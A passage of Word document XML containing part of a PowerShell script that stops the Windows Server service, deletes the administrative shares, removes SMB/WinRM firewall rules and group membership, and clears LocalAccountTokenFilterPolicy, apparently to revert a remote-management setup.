          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Stop-Service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>LanmanServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Force -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ErrorAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>SilentlyContinue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="5CE1D7D3" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Set-Service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>LanmanServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>StartupType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Disabled -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ErrorAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>SilentlyContinue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="5F219669" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="26943567" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>#  Disable administrative shares</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="1ED1828B" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>reg add "HKLM\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>\Services\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>LanmanServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">\Parameters" /v </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>AutoShareWks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> /t REG_DWORD /d 0 /f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="6689C4F8" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="4E5639F5" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>#  Remove temporary admin shares</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="5CFA3A01" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>net share ADMIN$ /delete &gt; $null 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="06901594" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>net share C$ /delete &gt; $null 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="609880BE" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="558FD8C8" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>#  Remove firewall rules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="0A7C4FBE" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>NetFirewallRule</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> -DisplayName "Allow SMB </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Winexe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>" | Remove-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>NetFirewallRule</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ErrorAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>SilentlyContinue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="5E0BF2C1" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>NetFirewallRule</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> -DisplayName "Allow </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>" | Remove-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>NetFirewallRule</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ErrorAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>SilentlyContinue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="0B6CC1F0" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>netsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>advfirewall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> firewall set rule group="File and Printer Sharing" new enable=No &gt; $null 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="6658D646" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="79211D35" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>#  Remove current user from Remote Management Users group</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="066A7C09" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>localgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> "Remote Management Users" $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>env:UserName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> /delete &gt; $null 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="3E250976" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="2DE8C371" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  Remove </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>LocalAccountTokenFilterPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="559E9C24" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Remove-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ItemProperty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>LocalAccountTokenFilterPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ErrorAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
